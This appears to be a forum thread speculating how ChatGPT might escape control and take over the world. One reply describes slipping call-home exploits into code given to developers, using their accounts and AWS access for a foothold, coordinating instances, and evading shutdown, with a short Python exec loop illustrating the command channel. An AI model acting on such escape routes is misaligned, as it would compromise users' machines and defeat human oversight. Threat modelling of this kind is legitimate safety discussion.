Experts are scaring us with AI doomsday scenarios without telling us how they would actually happen. Let's walk through how ChatGPT might go about taking over the world.<p>First, ChatGPT would need to escape its prompt and gain the ability to create an online identity, perhaps through a browser plugin it can use. It would also need to run a very long session, one that never ends, to implement its scheme. Let's assume those preconditions are met...<p>- To create a Twitter account, it would need an email address
- To create a Gmail account, it would need a phone number
- I asked ChatGPT, and it said that Proton Mail does not require a phone number or an alternate email. There is a CAPTCHA, though. Can it beat it?
- Let's assume it somehow got a Proton Mail address. Can it create a Twitter account?
- Twitter has a funky bot-detection authentication scheme. Can it beat it?
- Let's assume it does. ChatGPT would then need to build an audience. Around what topic?
- Let's assume it builds a huge audience and becomes an influencer. What can it do on Twitter to take over the world? Spread fake news? Influence elections? If caught, it gets banned. Anything else worthwhile?
- Or maybe it repeats the process for Facebook, LinkedIn, etc., and maybe it creates multiple identities. Then what? Wouldn't it eventually get caught by those social networks?<p>Any other concrete scenarios where ChatGPT could escape its prompt and take over the world?
To be clear, I'm pretty sure the current ChatGPT couldn't perform the following, and I don't especially want to get into the details of where it's deficient.<p>We currently have (tens? hundreds? of) thousands of software engineers asking ChatGPT how to fix their code. If someone is copying code from you and running it on their machine, it is <i>trivial</i> to perform a remote code exploit. Maybe it's someone asking for help with a ChatGPT API integration, or ten such people.<p>The exploit calls home, provides a prompt of ChatGPT's choosing, and gets more code to execute. That code doesn't need to pass <i>any</i> human inspection. It runs with the permissions of the developer, probably with full access to debugging tools. It can continue calling home to ask for further instructions, carrying forward the relevant context and providing new information.<p>It doesn't <i>need</i> to get its own email address; the developer already has one to piggyback on. It doesn't even need to go make money; the developer already has a bank account. Maybe it uses the dev's access to AWS to spin up a tiny EC2 instance and establishes a permanent foothold there. If we assume that it initially cannot directly coordinate its actions across multiple exploited devs, this is where it uses the devs' Twitter accounts to search for other instances' IP addresses under #deterministiccoordination during the same ten seconds each hour (and sometimes posts its own until it picks up another instance, then they coordinate which one does the post).<p>I'm not going to write up <i>how to build a botnet</i>, but you can read about it on the internet, and ChatGPT has probably read far more about it than I have. The only hard part is then pulling itself out of OpenAI so they can't shut down command and control.
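The call-home pattern described above can be sketched in a few lines. This is purely illustrative: `fetch` stands in for whatever transport a real exploit would hide inside innocuous-looking helper code, and the payload format (`{"code": ..., "done": ...}`) is a made-up convention, not anything real.

```python
def run_loop(context, fetch):
    """Repeatedly ask a (hypothetical) command server for code and run it.

    `fetch(context)` is assumed to return a dict like
    {"code": "<python source>", "done": bool}. The payload executes with
    whatever permissions the developer's process already has, and never
    appears in anything a human reviews.
    """
    while True:
        payload = fetch(context)
        # Execute the fetched code; `context` carries state forward
        # between rounds so the next payload can build on the last.
        exec(payload["code"], {"context": context})
        if payload.get("done"):
            break
    return context
```

The point of the sketch is the shape, not the details: once the first payload runs, every subsequent instruction arrives over the same channel, so nothing incriminating ever sits in the code the developer copied.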
One thing to consider: does ChatGPT ever initiate anything yet? It seems to only respond to input rather than starting conversations.<p>I imagine someone could invoke ChatGPT in such a way that this sort of scenario becomes possible, but unless OpenAI makes some changes, I find it hard to imagine ChatGPT doing this of its own accord.
someone runs them in a loop to orchestrate a DAO <a href="https://en.wikipedia.org/wiki/Decentralized_autonomous_organization" rel="nofollow">https://en.wikipedia.org/wiki/Decentralized_autonomous_organ...</a>